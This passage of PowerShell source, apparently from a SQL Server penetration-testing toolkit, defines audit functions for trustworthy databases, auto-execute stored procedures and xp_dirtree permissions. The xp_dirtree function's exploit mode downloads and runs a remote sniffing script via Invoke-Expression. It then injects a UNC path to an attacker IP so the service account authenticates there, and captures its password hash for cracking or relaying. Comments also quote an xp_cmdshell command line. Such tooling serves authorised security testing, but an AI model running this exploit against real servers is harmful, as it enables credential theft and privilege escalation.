.PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER Exploit\n            Exploit vulnerable issues.\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAuditPrivTrustworthy -Instance SQLServer1\\STANDARDDEV2014\n\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\STANDARDDEV2014\n            Vulnerability : Excessive Privilege - Trustworthy Database\n            Description   : One or more database is configured as trustworthy.  The TRUSTWORTHY database property is used to indicate whether the instance of SQL Server trusts the database\n            and the contents within it.  Including potentially malicious assemblies with an EXTERNAL_ACCESS or UNSAFE permission setting. Also, potentially malicious modules\n            that are defined to execute as high privileged users. Combined with other weak configurations it can lead to user impersonation and arbitrary code exection on\n            the server.\n            Remediation   : Configured the affected database so the 'is_trustworthy_on' flag is set to 'false'.  A query similar to 'ALTER DATABASE MyAppsDb SET TRUSTWORTHY ON' is used to\n            set a database as trustworthy.  A query similar to 'ALTER DATABASE MyAppDb SET TRUSTWORTHY OFF' can be use to unset it.\n            Severity      : Low\n            IsVulnerable  : Yes\n            IsExploitable : No\n            Exploited     : No\n            ExploitCmd    : There is not exploit available at this time.\n            Details       : The database testdb was found configured as trustworthy.\n            Reference     : https://msdn.microsoft.com/en-us/library/ms187861.aspx\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain | Invoke-SQLAuditPrivTrustworthy -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [string]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n    }\n\n    Process\n    {\n        # Status User\n        Write-Verbose -Message \"$Instance : START VULNERABILITY CHECK: Excessive Privilege - Trusted Database\"\n\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : CONNECTION FAILED.\"\n            Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Trusted Database.\"\n            Return\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : CONNECTION SUCCESS.\"\n        }\n\n        # Grab server information\n        $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        $CurrentLogin = $ServerInfo.CurrentLogin\n        $ComputerName = $ServerInfo.ComputerName\n\n        # --------------------------------------------\n        # Set function meta data for report output\n        # --------------------------------------------\n        if($Exploit)\n        {\n            $TestMode  = 'Exploit'\n        }\n        else\n        {\n            $TestMode  = 'Audit'\n        }\n        $Vulnerability = 'Excessive Privilege - Trustworthy Database'\n        $Description   = 'One or more database is configured as trustworthy.  The TRUSTWORTHY database property is used to indicate whether the instance of SQL Server trusts the database and the contents within it.  Including potentially malicious assemblies with an EXTERNAL_ACCESS or UNSAFE permission setting. Also, potentially malicious modules that are defined to execute as high privileged users. Combined with other weak configurations it can lead to user impersonation and arbitrary code exection on the server.'\n        $Remediation   = \"Configured the affected database so the 'is_trustworthy_on' flag is set to 'false'.  A query similar to 'ALTER DATABASE MyAppsDb SET TRUSTWORTHY ON' is used to set a database as trustworthy.  A query similar to 'ALTER DATABASE MyAppDb SET TRUSTWORTHY OFF' can be use to unset it.\"\n        $Severity      = 'Low'\n        $IsVulnerable  = 'No'\n        $IsExploitable = 'No'\n        $Exploited     = 'No'\n        $ExploitCmd    = 'There is not exploit available at this time.'\n        $Details       = ''\n        $Reference     = 'https://msdn.microsoft.com/en-us/library/ms187861.aspx'\n        $Author        = 'Scott Sutherland (@_nullbind), NetSPI 2016'\n\n        # -----------------------------------------------------------------\n        # Check for the Vulnerability\n        # Note: Typically a missing patch or weak configuration\n        # -----------------------------------------------------------------\n\n        # Select links configured with static credentials\n        $TrustedDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.DatabaseName -ne 'msdb' -and $_.is_trustworthy_on -eq 'True'\n        }\n\n        # Update vulnerable status\n        if($TrustedDatabases)\n        {\n            $IsVulnerable  = 'Yes'\n            $TrustedDatabases |\n            ForEach-Object -Process {\n                $DatabaseName = $_.DatabaseName\n\n                Write-Verbose -Message \"$Instance : - The database $DatabaseName was found configured as trustworthy.\"\n                $Details = \"The database $DatabaseName was found configured as trustworthy.\"\n                $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)\n            }\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : - No non-default trusted databases were found.\"\n        }\n\n        # -----------------------------------------------------------------\n        # Check for exploit dependancies\n        # Note: Typically secondary configs required for dba/os execution\n        # -----------------------------------------------------------------\n        # $IsExploitable = \"No\" or $IsExploitable = \"Yes\"\n        # Check if the link is alive and verify connection + check if sysadmin\n\n\n        # -----------------------------------------------------------------\n        # Exploit Vulnerability\n        # Note: Add the current user to sysadmin fixed server role\n        # -----------------------------------------------------------------\n        # $Exploited = \"No\" or $Exploited     = \"Yes\"\n        # select * from openquery(\"server\\intance\",'EXEC xp_cmdshell whoami WITH RESULT SETS ((output VARCHAR(MAX)))')\n        # Also, recommend link crawler module\n\n\n        # Status User\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Trusted Database\"\n    }\n\n    End\n    {\n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# ---------------------------------------\n# Invoke-SQLAuditPrivAutoExecSp\n# ---------------------------------------\n# Author: Scott Sutherland\nFunction  Invoke-SQLAuditPrivAutoExecSp\n{\n    <#\n            .SYNOPSIS\n            Check if any databases have been configured as trustworthy.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER Exploit\n            Exploit vulnerable issues.\n            .EXAMPLE\n            PS C:\\>  Invoke-SQLAuditPrivAutoExecSp -Instance SQLServer1\\STANDARDDEV2014\n\n            .EXAMPLE\n            PS C:\\>  Invoke-SQLInstanceLocal | Invoke-SQLAuditPrivAutoExecSp -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [string]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblAutoExecPrivs = new-object System.Data.DataTable \n        $TblAutoExecPrivs.Columns.add('ComputerName') | Out-Null\n        $TblAutoExecPrivs.Columns.add('Instance') | Out-Null\n        $TblAutoExecPrivs.Columns.add('DatabaseName') | Out-Null\n        $TblAutoExecPrivs.Columns.add('SchemaName') | Out-Null\n        $TblAutoExecPrivs.Columns.add('ProcedureName') | Out-Null\n        $TblAutoExecPrivs.Columns.add('ProcedureType') | Out-Null\n        $TblAutoExecPrivs.Columns.add('ProcedureDefinition') | Out-Null\n        $TblAutoExecPrivs.Columns.add('SQL_DATA_ACCESS') | Out-Null\n        $TblAutoExecPrivs.Columns.add('ROUTINE_BODY') | Out-Null    \n        $TblAutoExecPrivs.Columns.add('CREATED') | Out-Null         \n        $TblAutoExecPrivs.Columns.add('LAST_ALTERED') | Out-Null    \n        $TblAutoExecPrivs.Columns.add('is_ms_shipped') | Out-Null   \n        $TblAutoExecPrivs.Columns.add('is_auto_executed') | Out-Null \n        $TblAutoExecPrivs.Columns.add('PrincipalName') | Out-Null\n        $TblAutoExecPrivs.Columns.add('PrincipalType') | Out-Null\n        $TblAutoExecPrivs.Columns.add('PermissionName') | Out-Null\n        $TblAutoExecPrivs.Columns.add('PermissionType') | Out-Null\n        $TblAutoExecPrivs.Columns.add('StateDescription') | Out-Null\n        $TblAutoExecPrivs.Columns.add('ObjectName') | Out-Null\n        $TblAutoExecPrivs.Columns.add('ObjectType') | Out-Null\n\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n    }\n\n    Process\n    {\n        # Status User\n        Write-Verbose -Message \"$Instance : START VULNERABILITY CHECK: Excessive Privilege - Auto Execute Stored Procedure\"\n\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : CONNECTION FAILED.\"\n            Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Auto Execute Stored Procedure.\"\n            Return\n        }\n\n        # Grab server information\n        $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        $CurrentLogin = $ServerInfo.CurrentLogin\n        $ComputerName = $ServerInfo.ComputerName\n\n        # --------------------------------------------\n        # Set function meta data for report output\n        # --------------------------------------------\n        if($Exploit)\n        {\n            $TestMode  = 'Exploit'\n        }\n        else\n        {\n            $TestMode  = 'Audit'\n        }\n        $Vulnerability = 'Excessive Privilege - Auto Execute Stored Procedure'\n        $Description   = 'A stored procedured is configured for automatic execution and has explicit permissions assigned.  This may allow non sysadmin logins to execute queries as \"sa\" when the SQL Server service is restarted.'\n        $Remediation   = \"Ensure that non sysadmin logins do not have privileges to ALTER stored procedures configured with the is_auto_executed settting set to 1.\"\n        $Severity      = 'Low'\n        $IsVulnerable  = 'No'\n        $IsExploitable = 'No'\n        $Exploited     = 'No'\n        $ExploitCmd    = 'There is not exploit available at this time.'\n        $Details       = ''\n        $Reference     = 'https://msdn.microsoft.com/en-us/library/ms187861.aspx'\n        $Author        = 'Scott Sutherland (@_nullbind), NetSPI 2016'\n\n        # -----------------------------------------------------------------\n        # Check for the Vulnerability\n        # Note: Typically a missing patch or weak configuration\n        # -----------------------------------------------------------------\n        $IsVulnerable  = 'Yes'\n\n        # Get list of autoexec stored procedures\n        $AutoProcs = Get-SQLStoredProcedureAutoExec -Verbose -Instance $Instance -Username $username -Password $password -Credential $credential \n\n        # Get count\n        $AutoCount = $AutoProcs | measure | select count -ExpandProperty count\n\n        if($AutoCount -eq 0){\n            Write-Verbose \"$Instance : No stored procedures were found configured to auto execute.\"\n            return\n        }\n\n        # Get permissions for procs\n        Write-Verbose \"$Instance : Checking permissions...\"\n        $AutoProcs | \n        foreach-object {\n    \n            # Grab autoexec proc info\n            $ComputerName = $_.ComputerName\n            $Instance = $_.Instance\n            $DatabaseName = $_.DatabaseName\n            $SchemaName = $_.SchemaName\n            $ProcedureName = $_.ProcedureName\n            $ProcedureType = $_.ProcedureType\n            $ProcedureDefinition = $_.ProcedureDefinition\n            $SQL_DATA_ACCESS = $_.SQL_DATA_ACCESS\n            $ROUTINE_BODY = $_.ROUTINE_BODY\n            $CREATED = $_.CREATED\n            $LAST_ALTERED = $_.LAST_ALTERED\n            $is_ms_shipped = $_.is_ms_shipped\n            $is_auto_executed = $_.is_auto_executed    \n\n            # Get a list of explicit permissions \n\t        $Results = Get-SQLDatabasePriv -Verbose -DatabaseName master -SuppressVerbose -Instance $Instance -Username $username -Password $password -Credential $credential | \n            Where-Object {$_.objectname -like \"$ProcedureName\"}\n\n            # Check if any permisssions exist\n            $PermCount = $Results | measure | select count -ExpandProperty count\n\n            # Add record\n            if($PermCount -ge 1){\n\n                # Itererate through each permission\n                $Results | \n                ForEach-Object {\n\n                    # Grab permission info\n                    $PrincipalName = $_.PrincipalName\n                    $PrincipalType = $_.PrincipalType\n                    $PermissionName = $_.PermissionName\n                    $PermissionType = $_.PermissionType\n                    $StateDescription = $_.StateDescription\n                    $ObjectType = $_.ObjectType\n                    $ObjectName = $_.ObjectName\n\n                    $FullSpName = \"$DatabaseName.$SchemaName.$ProcedureName\"\n        \n                    # Add row to results\n                    $TblAutoExecPrivs.Rows.Add(\n                        $ComputerName,\n                        $Instance,\n                        $DatabaseName,\n                        $SchemaName,\n                        $ProcedureName,\n                        $ProcedureType,\n                        $ProcedureDefinition,\n                        $SQL_DATA_ACCESS,\n                        $ROUTINE_BODY,\n                        $CREATED,\n                        $LAST_ALTERED,\n                        $is_ms_shipped,\n                        $is_auto_executed,\n                        $PrincipalName,\n                        $PrincipalType,\n                        $PermissionName,\n                        $PermissionType,\n                        $StateDescription,\n                        $ObjectName,\n                        $ObjectType\n                    ) | Out-Null\n\n                    Write-Verbose -Message \"$Instance : - $PrincipalName has $StateDescription $PermissionName on $FullSpName.\"\n                    $Details = \"$PrincipalName has $StateDescription $PermissionName on $FullSpName.\"\n                    $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author)            \n                }\n            }\n        }\n\n        #$TblAutoExecPrivs       \n\n        # -----------------------------------------------------------------\n        # Check for exploit dependancies\n        # Note: Typically secondary configs required for dba/os execution\n        # -----------------------------------------------------------------\n        # $IsExploitable = \"No\" or $IsExploitable = \"Yes\"\n        # Check if the link is alive and verify connection + check if sysadmin\n        $IsExploitable = \"Unknown\"\n\n        # -----------------------------------------------------------------\n        # Exploit Vulnerability\n        # Note: Add the current user to sysadmin fixed server role\n        # -----------------------------------------------------------------\n        # $Exploited = \"No\" or $Exploited     = \"Yes\"\n        # select * from openquery(\"server\\intance\",'EXEC xp_cmdshell whoami WITH RESULT SETS ((output VARCHAR(MAX)))')\n        # Also, recommend link crawler module\n\n\n        # Status User\n        Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Trusted Database\"\n    }\n\n    End\n    {\n        # Return data\n        if ( -not $NoOutput)\n        {\n            Return $TblData\n        }\n    }\n}\n\n\n# ---------------------------------------\n# Invoke-SQLAuditPrivXpDirtree\n# ---------------------------------------\n# Author: Scott Sutherland\nFunction Invoke-SQLAuditPrivXpDirtree\n{\n    <#\n            .SYNOPSIS\n            Check if the current user has privileges to execute xp_dirtree extended stored procedure.\n            If exploit option is used, the script will inject a UNC path to the attacker's IP and capture\n            the SQL Server service account password hash using Inveigh.\n            .PARAMETER Username\n            SQL Server or domain account to authenticate with.\n            .PARAMETER Password\n            SQL Server or domain account password to authenticate with.\n            .PARAMETER Credential\n            SQL Server credential.\n            .PARAMETER Instance\n            SQL Server instance to connection to.\n            .PARAMETER Exploit\n            Exploit vulnerable issues.\n            .PARAMETER AttackerIp\n            IP that the SQL Server service will attempt to authenticate to, and password hashes will be captured from.\n            .PARAMETER TimeOut\n            Number of seconds to wait for authentication from target SQL Server.\n            .EXAMPLE\n            PS C:\\> Invoke-SQLAuditPrivXpDirtree -Verbose -Instance SQLServer1\\STANDARDDEV2014 -AttackerIp 10.1.1.2\n\n            ComputerName  : SQLServer1\n            Instance      : SQLServer1\\STANDARDDEV2014\n            Vulnerability : Excessive Privilege - Execute xp_dirtree\n            Description   : xp_dirtree is a native extended stored procedure that can be executed by members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to force\n            the SQL Server service account to authenticate to a remote attacker.  The service account password hash can then be captured + cracked or relayed to gain unauthorized\n            access to systems. This also means xp_dirtree can be used to escalate a lower privileged user to sysadmin when a machine or managed account isnt being used.  Thats\n            because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by default.\n            Remediation   : Remove EXECUTE privileges on the XP_DIRTREE procedure for non administrative logins and roles.  Example command: REVOKE EXECUTE ON xp_dirtree to Public\n            Severity      : Medium\n            IsVulnerable  : Yes\n            IsExploitable : Yes\n            Exploited     : Yes\n            ExploitCmd    : Crack the password hash offline or relay it to another system.\n            Details       : The public principal has EXECUTE privileges on XP_DIRTREE procedure in the master database. Recovered password hash! Hash type =\n            NetNTLMv1;Hash = SQLSvcAcnt::Domain:0000000000000000400000000000000000000000000000000:1CEC319E75261CEC319E759E7511E1CEC319E753AB7D:\n            Reference     : https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/\n            Author        : Scott Sutherland (@_nullbind), NetSPI 2016\n\n            .EXAMPLE\n            PS C:\\> Get-SQLInstanceDomain -Verbose | Invoke-SQLAuditPrivXpDirtree -Verbose\n    #>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account to authenticate with.')]\n        [string]$Username,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server or domain account password to authenticate with.')]\n        [string]$Password,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'Windows credentials.')]\n        [System.Management.Automation.PSCredential]\n        [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $false,\n                ValueFromPipelineByPropertyName = $true,\n        HelpMessage = 'SQL Server instance to connection to.')]\n        [string]$Instance,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = \"Don't output anything.\")]\n        [string]$NoOutput,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Exploit vulnerable issues.')]\n        [switch]$Exploit,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'IP that the SQL Server service will attempt to authenticate to, and password hashes will be captured from.')]\n        [string]$AttackerIp,\n\n        [Parameter(Mandatory = $false,\n        HelpMessage = 'Time in second to way for hash to be captured.')]\n        [int]$TimeOut = 5\n    )\n\n    Begin\n    {\n        # Table for output\n        $TblData = New-Object -TypeName System.Data.DataTable\n        $null = $TblData.Columns.Add('ComputerName')\n        $null = $TblData.Columns.Add('Instance')\n        $null = $TblData.Columns.Add('Vulnerability')\n        $null = $TblData.Columns.Add('Description')\n        $null = $TblData.Columns.Add('Remediation')\n        $null = $TblData.Columns.Add('Severity')\n        $null = $TblData.Columns.Add('IsVulnerable')\n        $null = $TblData.Columns.Add('IsExploitable')\n        $null = $TblData.Columns.Add('Exploited')\n        $null = $TblData.Columns.Add('ExploitCmd')\n        $null = $TblData.Columns.Add('Details')\n        $null = $TblData.Columns.Add('Reference')\n        $null = $TblData.Columns.Add('Author')\n    }\n\n    Process\n    {\n        # Status User\n        Write-Verbose -Message \"$Instance : START VULNERABILITY CHECK: Excessive Privilege - xp_dirtree\"\n\n        # Test connection to server\n        $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript {\n            $_.Status -eq 'Accessible'\n        }\n        if(-not $TestConnection)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : CONNECTION FAILED.\"\n            Write-Verbose -Message \"$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - xp_dirtree.\"\n            Return\n        }\n        else\n        {\n            Write-Verbose -Message \"$Instance : CONNECTION SUCCESS.\"\n        }\n\n        # Grab server information\n        # Grab server, login, and role information\n        $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose\n        $ComputerName = $ServerInfo.ComputerName\n        $CurrentLogin = $ServerInfo.CurrentLogin\n        $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin  -SuppressVerbose\n        $CurrentPrincpalList = @()\n        $CurrentPrincpalList += $CurrentLogin\n        $CurrentPrincpalList += 'Public'\n        $CurrentLoginRoles | ForEach-Object -Process {\n            $CurrentPrincpalList += $_.RolePrincipalName\n        }\n\n        # --------------------------------------------\n        # Set function meta data for report output\n        # --------------------------------------------\n        if($Exploit)\n        {\n            $TestMode  = 'Exploit'\n        }\n        else\n        {\n            $TestMode  = 'Audit'\n        }\n        $Vulnerability = 'Excessive Privilege - Execute xp_dirtree'\n        $Description   = 'xp_dirtree is a native extended stored procedure that can be executed by members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to force the SQL Server service account to authenticate to a remote attacker.  The service account password hash can then be captured + cracked or relayed to gain unauthorized access to systems. This also means xp_dirtree can be used to escalate a lower privileged user to sysadmin when a machine or managed account isnt being used.  Thats because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by default.'\n        $Remediation   = 'Remove EXECUTE privileges on the XP_DIRTREE procedure for non administrative logins and roles.  Example command: REVOKE EXECUTE ON xp_dirtree to Public'\n        $Severity      = 'Medium'\n        $IsVulnerable  = 'No'\n        $IsExploitable = 'No'\n        $Exploited     = 'No'\n        $ExploitCmd    = 'Crack the password hash offline or relay it to another system.'\n        $Details       = ''\n        $Reference     = 'https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/'\n        $Author        = 'Scott Sutherland (@_nullbind), NetSPI 2016'\n\n        # -----------------------------------------------------------------\n        # Check for the Vulnerability\n        # Note: Typically a missing patch or weak configuration\n        # -----------------------------------------------------------------\n\n        # Get users and roles that execute xp_dirtree\n        $DirTreePrivs = Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName master -SuppressVerbose | Where-Object -FilterScript {\n            $_.ObjectName -eq 'xp_dirtree' -and $_.PermissionName -eq 'EXECUTE' -and $_.statedescription -eq 'grant'\n        }\n\n        # Update vulnerable status\n        if($DirTreePrivs)\n        {\n            # Status user\n            Write-Verbose -Message \"$Instance : - At least one principal has EXECUTE privileges on xp_dirtree.\"\n\n            $IsVulnerable  = 'Yes'\n\n            if($Exploit){\n                # Check if the current process has elevated privs\n                # https://msdn.microsoft.com/en-us/library/system.security.principal.windowsprincipal(v=vs.110).aspx\n                $CurrentIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent()\n                $prp = New-Object -TypeName System.Security.Principal.WindowsPrincipal -ArgumentList ($CurrentIdentity)\n                $adm = [System.Security.Principal.WindowsBuiltInRole]::Administrator\n                $IsAdmin = $prp.IsInRole($adm)\n            \n                if(-not $IsAdmin)\n                {\n                    Write-Verbose -Message \"$Instance : - You do not have Administrator rights. Run this function as an Administrator in order to load Inveigh.\"\n                    $IAMADMIN = 'No'\n                }else{\n                    Write-Verbose -Message \"$Instance : - You have Administrator rights. Inveigh will be loaded.\"\n                    $IAMADMIN = 'Yes'\n                }\n            }\n            \n            $DirTreePrivs |\n            ForEach-Object -Process {\n                $PrincipalName = $DirTreePrivs.PrincipalName\n\n                # Check if current login can exploit\n                $CurrentPrincpalList |\n                ForEach-Object -Process {\n                    $PrincipalCheck = $_\n\n                    if($PrincipalName -eq $PrincipalCheck -or $PrincipalName -eq 'public')\n                    {\n                        $IsExploitable  = 'Yes'                      \n\n                        # Check for exploit flag\n                        if(($IAMADMIN -eq 'Yes') -and ($Exploit))\n                        {\n                            # Attempt to load Inveigh from file\n                            #$InveighSrc = Get-Content .\\scripts\\Inveigh.ps1 -ErrorAction SilentlyContinue | Out-Null\n                            #Invoke-Expression($InveighSrc)\n\n                            # Get IP of current system\n                            if(-not $AttackerIp)\n                            {\n                                $AttackerIp = (Test-Connection -ComputerName 127.0.0.1 -Count 1 |\n                                    Select-Object -ExpandProperty Ipv4Address |\n                                Select-Object -Property IPAddressToString -ExpandProperty IPAddressToString)\n\n                                if($AttackerIp -eq '127.0.0.1')\n                                {\n                                    $AttackerIp = Get-WmiObject -Class win32_networkadapterconfiguration -Filter \"ipenabled = 'True'\" -ComputerName $env:COMPUTERNAME |\n                                    Select-Object -First 1 -Property @{\n                                        Name       = 'IPAddress'\n                                        Expression = {\n                                            [regex]$rx = '(\\d{1,3}(\\.?)){4}'; $rx.matches($_.IPAddress)[0].Value\n                                        }\n                                    } |\n                                    Select-Object -Property IPaddress -ExpandProperty IPAddress -First 1\n                                }\n                            }\n\n                            # Attempt to load Inveigh via reflection\n                            Invoke-Expression -Command (New-Object -TypeName system.net.webclient).downloadstring('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1')\n\n                            $TestIt = Test-Path -Path Function:\\Invoke-Inveigh\n                            if($TestIt -eq 'True')\n                            {\n                                Write-Verbose -Message \"$Instance : - Inveigh loaded.\"\n\n                                # Get IP of SQL Server instance\n                                $InstanceIP = [System.Net.Dns]::GetHostAddresses($ComputerName)\n\n                                # Start sniffing for hashes from that IP\n                                Write-Verbose -Message \"$Instance : - Start sniffing...\"\n                                $null = Invoke-Inveigh -HTTP N -NBNS Y -MachineAccounts Y -WarningAction SilentlyContinue -IP $AttackerIp\n\n                                # Randomized 5 character file name\n                                $path = (-join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}))\n\n                                # Sent unc path to attacker's Ip\n                                Write-Verbose -Message \"$Instance : - Inject UNC path to \\\\$AttackerIp\\$path...\"\n                                $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query \"xp_dirtree '\\\\$AttackerIp\\$path'\" -TimeOut 10 -SuppressVerbose\n\n\t\t\t\t\t\t\t\t# Sleep for $Timeout seconds to ensure that slow connections make it back to the listener\n\t\t\t\t\t\t\t\tWrite-Verbose -Message \"$Instance : - Sleeping for $TimeOut seconds to ensure the hash comes back\"\n                                Start-Sleep -s $TimeOut\n                                \n                                # Stop sniffing and print password hashes\n                                $null = Stop-Inveigh\n                                Write-Verbose -Message \"$Instance : - Stopped sniffing.\"\n\n                                $HashType = ''\n                                $Hash = ''\n\n                                [string]$PassCleartext = Get-Inveigh -Cleartext Y\n                                if($PassCleartext)\n                                {\n                                    $HashType = 'Cleartext'\n                                    $Hash = $PassCleartext\n                                }\n\n                                [string]$PassNetNTLMv1 = Get-Inveigh -NTLMv1 Y\n                                if($PassNetNTLMv1)\n                                {\n                                    $HashType = 'NetNTLMv1'\n                                    $Hash = $PassNetNTLMv1\n                                }\n\n                                [string]$PassNetNTLMv2 = Get-Inveigh -NTLMv2 Y\n                                if($PassNetNTLMv2)\n                                {\n                                    $HashType = 'NetNTLMv2'\n                                    $Hash = $PassNetNTLMv2\n                                }\n\n                                if($Hash)\n                                {\n                                    # Update Status\n                                    Write-Verbose -Message \"$Instance : - Recovered $HashType hash:\"\n                                    Write-Verbose -Message \"$Instance : - $Hash\"\n                                    $Exploited = 'Yes'\n\n                                    $Details = \"The $PrincipalName principal has EXECUTE privileges on the xp_dirtree procedure in the master database. Recovered password hash! Hash type = $HashType;Hash = $Hash\"\n                                }\n                                else\n                                {\n                                    # Update Status\n                                    $Exploited = 'No'\n                                    $Details = \"The $PrincipalName principal has EXECUTE privileges on the xp_dirtree procedure in the master database.  xp_dirtree Executed, but no password hash was recovered.\"\n                                }\n\n                                # Clear inveigh cache\n                                $null = Clear-Inveigh\n                            }\n                            